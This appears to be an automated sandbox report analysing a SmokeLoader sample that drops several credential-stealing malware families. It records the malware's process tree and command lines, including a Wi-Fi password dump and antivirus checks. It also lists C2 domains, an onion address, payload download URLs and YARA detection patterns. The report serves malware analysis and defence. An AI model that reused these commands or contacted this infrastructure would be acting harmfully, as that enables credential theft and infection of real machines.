Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
987123.exe

Overview

General Information

Sample name:987123.exe
Analysis ID:1370880
MD5:1b92d73ac6ca807adc303c424eeeb80b
SHA1:836e751f86ab603920a22f1778ffc56d3d52a9ac
SHA256:d7567c94d64fc05b847558d0308b54df1a716fcbe45a480ade6f2987a5ebbaef
Tags:exeSmokeLoader
Infos:

Detection

LummaC, Eternity Stealer, LummaC Stealer, SmokeLoader, Stealc, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
System process connects to network (likely due to code injection or exploit)
Yara detected Eternity Stealer
Yara detected LummaC Stealer
Yara detected SmokeLoader
Yara detected Stealc
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Connects to a pastebin service (likely for C&C)
Contains functionality to inject code into remote processes
Contains functionality to modify clipboard data
Contains functionality to register a low level keyboard hook
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Drops PE files with a suspicious file extension
Drops PE files with benign system names
Found Tor onion address
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
May use the Tor software to hide its network traffic
Modifies the context of a thread in another process (thread injection)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Yara detected Generic Downloader
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 987123.exe (PID: 7136 cmdline: C:\Users\user\Desktop\987123.exe MD5: 1B92D73AC6CA807ADC303C424EEEB80B)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • regsvr32.exe (PID: 6240 cmdline: regsvr32 /s C:\Users\user\AppData\Local\Temp\35E5.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
        • regsvr32.exe (PID: 2004 cmdline: /s C:\Users\user\AppData\Local\Temp\35E5.dll MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • 3BD2.exe (PID: 1432 cmdline: C:\Users\user\AppData\Local\Temp\3BD2.exe MD5: 1B728C6E8F10313D7367C82E48D022DA)
        • conhost.exe (PID: 1440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 6564 cmdline: "C:\Windows\System32\cmd.exe" /k cmd < Advancement & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3412 cmdline: cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • tasklist.exe (PID: 6500 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
            • findstr.exe (PID: 2288 cmdline: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
            • tasklist.exe (PID: 6748 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
            • findstr.exe (PID: 5764 cmdline: findstr /I "wrsa.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
            • cmd.exe (PID: 7060 cmdline: cmd /c mkdir 15372 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • cmd.exe (PID: 7088 cmdline: cmd /c copy /b Zoo + Viewers + Bow + Contractors + Protection + Desk + Kinds 15372\Far.pif MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • cmd.exe (PID: 7156 cmdline: cmd /c copy /b Payday + Corporate + Spain 15372\i MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • Far.pif (PID: 3664 cmdline: 15372\Far.pif 15372\i MD5: BFA84DBDE0DF8F1CAD3E179BD46A6E34)
            • PING.EXE (PID: 932 cmdline: ping -n 5 localhost MD5: B3624DD758CCECF93A1226CEF252CA12)
      • 4577.exe (PID: 1896 cmdline: C:\Users\user\AppData\Local\Temp\4577.exe MD5: AA053CF4ED948FEC79703DEBBB45FBBF)
        • 4577.exe (PID: 4632 cmdline: C:\Users\user\AppData\Local\Temp\4577.exe MD5: AA053CF4ED948FEC79703DEBBB45FBBF)
      • Far.pif (PID: 2936 cmdline: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pif MD5: BFA84DBDE0DF8F1CAD3E179BD46A6E34)
      • 9D1E.exe (PID: 2736 cmdline: C:\Users\user\AppData\Local\Temp\9D1E.exe MD5: 2AA4B3C398F32A8D4403B21769ED1FC1)
        • InstallUtil.exe (PID: 6032 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
        • WerFault.exe (PID: 6692 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 1160 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • E35F.exe (PID: 6072 cmdline: C:\Users\user\AppData\Local\Temp\E35F.exe MD5: EAFEB784379E60C2D0BD8D46EAC05286)
        • InstallUtil.exe (PID: 5544 cmdline: XXX MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
          • cmd.exe (PID: 1188 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 3496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 6148 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
      • csrss.exe (PID: 2300 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: AA053CF4ED948FEC79703DEBBB45FBBF)
        • csrss.exe (PID: 2872 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: AA053CF4ED948FEC79703DEBBB45FBBF)
      • 2DF.exe (PID: 5968 cmdline: C:\Users\user\AppData\Local\Temp\2DF.exe MD5: 47FF6687383E2C84A0DDF860E8DB33EB)
        • WerFault.exe (PID: 5592 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 500 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • 5390.exe (PID: 4140 cmdline: C:\Users\user\AppData\Local\Temp\5390.exe MD5: 0E219D95AC454729366F376B54D9CFB4)
      • 1600.exe (PID: 4040 cmdline: C:\Users\user\AppData\Local\Temp\1600.exe MD5: AC1F652F56A5D8DA834680A729BB08C7)
        • 1600.tmp (PID: 8 cmdline: "C:\Users\user\AppData\Local\Temp\is-K8FH3.tmp\1600.tmp" /SL5="$D029C,4455529,54272,C:\Users\user\AppData\Local\Temp\1600.exe" MD5: A7662827ECAEB4FC68334F6B8791B917)
          • 1600.exe (PID: 3940 cmdline: "C:\Users\user\AppData\Local\Temp\1600.exe" /SPAWNWND=$B02AC /NOTIFYWND=$D029C MD5: AC1F652F56A5D8DA834680A729BB08C7)
      • FD8E.exe (PID: 6180 cmdline: C:\Users\user\AppData\Local\Temp\FD8E.exe MD5: 9DC46160B805B73634F4BD8507F11494)
  • ufhjbuw (PID: 5740 cmdline: C:\Users\user\AppData\Roaming\ufhjbuw MD5: 1B92D73AC6CA807ADC303C424EEEB80B)
  • svchost.exe (PID: 6128 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 6240 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2736 -ip 2736 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 5324 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5968 -ip 5968 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 2148 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ufhjbuw (PID: 5672 cmdline: C:\Users\user\AppData\Roaming\ufhjbuw MD5: 1B92D73AC6CA807ADC303C424EEEB80B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
{"C2 url": ["blastechohackopeower.pw", "goddirtybrilliancece.fun", "drownthinsaltroutese.pw"]}
{"Version": 2022, "C2 list": ["http://goodfooggooftool.net/index.php", "http://sulugilioiu19.net/index.php", "http://selebration17io.io/index.php", "http://vacantion18ffeu.cc/index.php", "http://valarioulinity1.net/index.php", "http://buriatiarutuhuob.net/index.php", "http://cassiosssionunu.me/index.php"]}
{"C2 url": ["http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\E35F.exeJoeSecurity_EternityStealerYara detected Eternity StealerJoe Security
        C:\Users\user\AppData\Local\Temp\E35F.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          C:\Users\user\AppData\Local\Temp\E35F.exeINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
          • 0xd0e18:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
          • 0xd0e8a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
          • 0xd0f14:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
          • 0xd0fa6:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
          • 0xd1010:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
          • 0xd1082:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
          • 0xd1118:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
          • 0xd11a8:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
          C:\Users\user\AppData\Local\Temp\9D1E.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Users\user\AppData\Local\Temp\9D1E.exeINDICATOR_EXE_Packed_DotNetReactorDetects executables packed with unregistered version of .NET ReactorditekSHen
            • 0x281721:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            00000023.00000002.2438435687.00000000004C0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
            • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
            00000022.00000002.2578542876.00000000005F0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              00000022.00000002.2578542876.00000000005F0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
              • 0x6a4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
              00000022.00000002.2579381005.0000000000730000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
              • 0x32af:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
              0000000D.00000002.2101613794.0000000002735000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
              • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
              Click to see the 32 entries
              SourceRuleDescriptionAuthorStrings
              35.2.5390.exe.4c0e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                30.0.E35F.exe.db8096.1.unpackJoeSecurity_EternityStealerYara detected Eternity StealerJoe Security
                  30.0.E35F.exe.db8096.1.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x48d82:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x48df4:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x48e7e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x48f10:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x48f7a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x48fec:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x49082:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x49112:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  35.2.5390.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                    35.3.5390.exe.4d0000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                      Click to see the 12 entries

                      Stealing of Sensitive Information

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: XXX, ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ParentProcessId: 5544, ParentProcessName: InstallUtil.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 1188, ProcessName: cmd.exe
                      No Snort rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 987123.exeAvira: detected
                      Source: http://5.42.66.0/288c47bbc187111b439df19ff4df68f076.exeAvira URL Cloud: Label: malware
                      Source: blastechohackopeower.pwAvira URL Cloud: Label: malware
                      Source: http://hugo.topteamlife.com/order/tuc5.exeAvira URL Cloud: Label: malware
                      Source: http://ftpvoyager.cc/ftp/index.phpAvira URL Cloud: Label: malware
                      Source: http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onionAvira URL Cloud: Label: malware
                      Source: http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/ef0e6c9136fd4b779a75726a3Avira URL Cloud: Label: malware
                      Source: C:\Users\user\AppData\Local\Temp\5390.exeAvira: detection malicious, Label: HEUR/AGEN.1312567
                      Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeAvira: detection malicious, Label: HEUR/AGEN.1303617
                      Source: C:\Users\user\AppData\Local\Temp\2DF.exeAvira: detection malicious, Label: HEUR/AGEN.1309922
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeAvira: detection malicious, Label: HEUR/AGEN.1305491
                      Source: C:\Users\user\AppData\Local\Temp\1600.exeAvira: detection malicious, Label: HEUR/AGEN.1332570
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeAvira: detection malicious, Label: HEUR/AGEN.1362350
                      Source: 00000022.00000002.2578542876.00000000005F0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://goodfooggooftool.net/index.php", "http://sulugilioiu19.net/index.php", "http://selebration17io.io/index.php", "http://vacantion18ffeu.cc/index.php", "http://valarioulinity1.net/index.php", "http://buriatiarutuhuob.net/index.php", "http://cassiosssionunu.me/index.php"]}
                      Source: InstallUtil.exe.6032.26.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["blastechohackopeower.pw", "goddirtybrilliancece.fun", "drownthinsaltroutese.pw"]}
                      Source: InstallUtil.exe.5544.42.memstrminMalware Configuration Extractor: Eternity Stealer {"C2 url": ["http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/"]}
                      Source: hugo.topteamlife.comVirustotal: Detection: 8%Perma Link
                      Source: gxutc2c.comVirustotal: Detection: 10%Perma Link
                      Source: ftpvoyager.ccVirustotal: Detection: 17%Perma Link
                      Source: blastechohackopeower.pwVirustotal: Detection: 5%Perma Link
                      Source: http://5.42.66.0/288c47bbc187111b439df19ff4df68f076.exeVirustotal: Detection: 19%Perma Link
                      Source: http://hugo.topteamlife.com/order/tuc5.exeVirustotal: Detection: 7%Perma Link
                      Source: C:\ProgramData\Drivers\csrss.exeReversingLabs: Detection: 69%
                      Source: C:\ProgramData\Drivers\csrss.exeVirustotal: Detection: 50%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\1600.exeVirustotal: Detection: 11%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeReversingLabs: Detection: 100%
                      Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeVirustotal: Detection: 64%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\35E5.dllReversingLabs: Detection: 60%
                      Source: C:\Users\user\AppData\Local\Temp\35E5.dllVirustotal: Detection: 62%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeReversingLabs: Detection: 69%
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeVirustotal: Detection: 50%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\5390.exeReversingLabs: Detection: 40%
                      Source: C:\Users\user\AppData\Local\Temp\5390.exeVirustotal: Detection: 46%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeReversingLabs: Detection: 27%
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeReversingLabs: Detection: 95%
                      Source: C:\Users\user\AppData\Local\Temp\InstallSetup9.exeReversingLabs: Detection: 91%
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwReversingLabs: Detection: 45%
                      Source: C:\Users\user\AppData\Roaming\wehjbuwReversingLabs: Detection: 40%
                      Source: 987123.exeReversingLabs: Detection: 45%
                      Source: 987123.exeVirustotal: Detection: 47%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\5390.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\35E5.dllJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\2DF.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeJoe Sandbox ML: detected
                      Source: C:\ProgramData\Drivers\csrss.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeJoe Sandbox ML: detected
                      Source: 987123.exeJoe Sandbox ML: detected
                      Source: 4577.exe, 00000018.00000002.2986069883.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_dd8477a9-3
                      Source: 987123.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log
                      Source: C:\Users\user\Desktop\987123.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49738 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49739 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49741 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.36.38.33:443 -> 192.168.2.4:49740 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49744 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49746 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49748 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49750 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49752 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49753 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49756 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49758 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49759 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49760 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49762 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49764 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49765 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49769 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49770 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49772 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.23.244.244:443 -> 192.168.2.4:49777 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49787 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 134.209.224.96:443 -> 192.168.2.4:49789 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.20.68.143:443 -> 192.168.2.4:49794 version: TLS 1.2
                      Source: Binary string: spelling_bythe_rules_of_language.pdb source: 9D1E.exe, 00000019.00000000.2171928326.0000000000FB2000.00000002.00000001.01000000.0000000C.sdmp, WERA42F.tmp.dmp.29.dr
                      Source: Binary string: WindowsFormsApp2.pdb source: E35F.exe, 0000001E.00000000.2271500419.0000000000D32000.00000002.00000001.01000000.00000011.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb;( source: WERA42F.tmp.dmp.29.dr
                      Source: Binary string: WindowsFormsApp9.pdbH source: E35F.exe, 0000001E.00000000.2271500419.0000000000D32000.00000002.00000001.01000000.00000011.sdmp
                      Source: Binary string: mscorlib.pdb source: WERA42F.tmp.dmp.29.dr
                      Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: 9D1E.exe, 00000019.00000002.2407029205.000000006F8F4000.00000002.00000001.01000000.0000000F.sdmp, 9D1E.exe, 00000019.00000002.2382443256.0000000006041000.00000004.00000800.00020000.00000000.sdmp, 9D1E.exe, 00000019.00000002.2303391732.00000000055ED000.00000004.00000800.00020000.00000000.sdmp, 9D1E.exe, 00000019.00000002.2394782575.00000000075E0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: System.ni.pdbRSDS source: WERA42F.tmp.dmp.29.dr
